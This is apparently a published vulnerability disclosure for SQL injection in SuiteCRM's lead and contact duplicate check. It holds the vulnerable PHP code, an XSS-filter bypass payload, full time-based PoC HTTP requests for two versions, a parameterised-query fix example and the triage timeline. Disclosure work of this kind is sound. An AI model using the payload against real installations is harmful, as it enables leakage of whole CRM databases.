Multiple SQL Injections in salesagility/suitecrm

Status: Valid

Reported on Oct 9th 2022


Description

User input is inserted directly into a SQL query in multiple places when duplicating contacts/leads.

Proof of Concept

For the PoC we use Leads, although the other occurrences will (probably) work analogously. Since the input is not reflected back to the user, we prove the SQL injection with a time-based check: a SLEEP() call is injected and the response time is measured.

The vulnerable code (the duplicate-check query builder for Leads, see the validated occurrence in LeadFormBase.php below) is:

$query = "SELECT id, first_name, last_name, account_name, title FROM leads ";
$query .= " WHERE deleted != 1 AND (status <> 'Converted' OR status IS NULL) AND ";

if (isset($_POST[$prefix.'first_name']) && strlen($_POST[$prefix.'first_name']) != 0 && isset($_POST[$prefix.'last_name']) && strlen($_POST[$prefix.'last_name']) != 0) {
    $query .= " (first_name='". $_POST[$prefix.'first_name'] . "' AND last_name = '". $_POST[$prefix.'last_name'] ."')";
} else {
    $query .= " last_name = '". $_POST[$prefix.'last_name'] ."'";
}

return $query;

In order to break out of the string, we need to insert a single-quote. However, single-quotes are HTML-entity encoded. The XSS filter can be tricked into injecting an unencoded single-quote by inserting a dummy </script> tag that is removed by the filter. The payload inserted into the last_name parameter looks like this: asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -.

PoC Requests

This is a PoC request (for SuiteCRM Version 7.12.7):

POST /index.php HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 484
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIInRESOo76zAzDIg
Referer: http://127.0.0.1:8001/index.php
Cookie: PHPSESSID=bjim2jhhk5dobsulut6gj4s9kt
Connection: close

------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="module"

Leads
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="action"

Save
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="first_name"

asd
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="last_name"

asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -
------WebKitFormBoundaryIInRESOo76zAzDIg--

SuiteCRM 8.1.3 is also vulnerable via the legacy code. The PoC request needs two adjustments: the path becomes /legacy/index.php, and the LEGACYSESSID cookie is required:

POST /legacy/index.php HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 484
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIInRESOo76zAzDIg
Referer: http://127.0.0.1:8001/index.php
Cookie: LEGACYSESSID=6cskbp5agsnaa83t4eld5gb03a; PHPSESSID=3eip2m4qvk131iob0dide5uh7st
Connection: close

------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="module"

Leads
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="action"

Save
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="first_name"

asd
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="last_name"

asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -
------WebKitFormBoundaryIInRESOo76zAzDIg--

The response takes approximately 5 seconds, proving that the injected SLEEP(5) was executed by the database and thus that we have SQL injection.

Impact

The impact is leakage of all data stored in the database.

Occurrences

Three occurrences were reported (see the validated file references below), each with the same note:

User input should not be inserted into a SQL query without sanitization.
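As an added example (not SuiteCRM's own code, and not the fix that shipped in 7.12.9), the lead duplicate-check query from the report rebuilt so that user input never becomes part of the SQL text. The column, table and WHERE clause are taken from the vulnerable snippet above; the PDO wiring, the DSN and the function names are assumptions for illustration. The point the report makes is that HTML-entity encoding of quotes (the XSS filter) is not a SQL defence, so the value is bound as a parameter instead of being escaped or filtered.

```php
<?php
declare(strict_types=1);

/**
 * Build the duplicate-check query with placeholders instead of interpolated
 * $_POST values. Returns the SQL text and the bound parameters separately, so
 * the database driver only ever sees user input as data, never as SQL.
 * Mirrors the branch logic of the original snippet (both names set and
 * non-empty -> match on both; otherwise match on last_name only).
 */
function buildDuplicateLeadQuery(array $post, string $prefix = ''): array
{
    $sql = "SELECT id, first_name, last_name, account_name, title FROM leads"
         . " WHERE deleted != 1 AND (status <> 'Converted' OR status IS NULL) AND ";
    $params = [];

    $first = (string) ($post[$prefix . 'first_name'] ?? '');
    $last  = (string) ($post[$prefix . 'last_name'] ?? '');

    if ($first !== '' && $last !== '') {
        $sql .= "(first_name = :first_name AND last_name = :last_name)";
        $params[':first_name'] = $first;
        $params[':last_name']  = $last;
    } else {
        $sql .= "last_name = :last_name";
        $params[':last_name'] = $last;
    }

    return [$sql, $params];
}

/**
 * Execute the query with a prepared statement. Emulated prepares are disabled
 * on the connection (see below) so that MySQL itself handles the placeholders.
 */
function findDuplicateLeads(PDO $db, array $post, string $prefix = ''): array
{
    [$sql, $params] = buildDuplicateLeadQuery($post, $prefix);
    $stmt = $db->prepare($sql);
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: the last_name payload from the report. With the builder
// above it is an ordinary string parameter; the SQL text contains no user data.
$post = [
    'first_name' => 'asd',
    'last_name'  => "asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -",
];
[$sql, $params] = buildDuplicateLeadQuery($post);
echo $sql, PHP_EOL;
var_dump($params);

// Assumed connection settings (hypothetical DSN and credentials).
// PDO::ATTR_EMULATE_PREPARES => false makes the server do the binding rather
// than the client library interpolating quoted values into the query string.
// $db = new PDO(
//     'mysql:host=127.0.0.1;dbname=suitecrm;charset=utf8mb4',
//     'user',
//     'pass',
//     [
//         PDO::ATTR_EMULATE_PREPARES => false,
//         PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     ]
// );
// $rows = findDuplicateLeads($db, $_POST);
```

Running the script shows the query text with :first_name and :last_name placeholders and the payload sitting in the parameter array; the quote and the trailing comment marker in it have no effect on the statement. The same pattern applies to the Contacts occurrence (ContactFormBase.php), which the report says is analogous.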

We are processing your report and will contact the salesagility/suitecrm team within 24 hours. a year ago
We have contacted a member of the salesagility/suitecrm team and are waiting to hear back a year ago
Jack Anderson
a year ago

Hi Vautia,

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

  • SCRMBT-#211 - Multiple SQL Injections when duplicating Leads/ Contacts

We will review the issue and confirm if it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue, or it does not need to be private, then we'll raise it via the GitHub bug tracker or a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

We have sent a follow up to the salesagility/suitecrm team. We will try again in 7 days. a year ago
We have sent a second follow up to the salesagility/suitecrm team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the salesagility/suitecrm team. This report is now considered stale. a year ago
vautia
a year ago

Researcher

Hi @maintainer, is there any update on this report?

Pavlos validated this vulnerability 7 months ago
vautia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 7.12.9 with commit c19f22 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pavlos published this vulnerability 7 months ago
LeadFormBase.php#L63-L76 has been validated
ContactFormBase.php#L71-L86 has been validated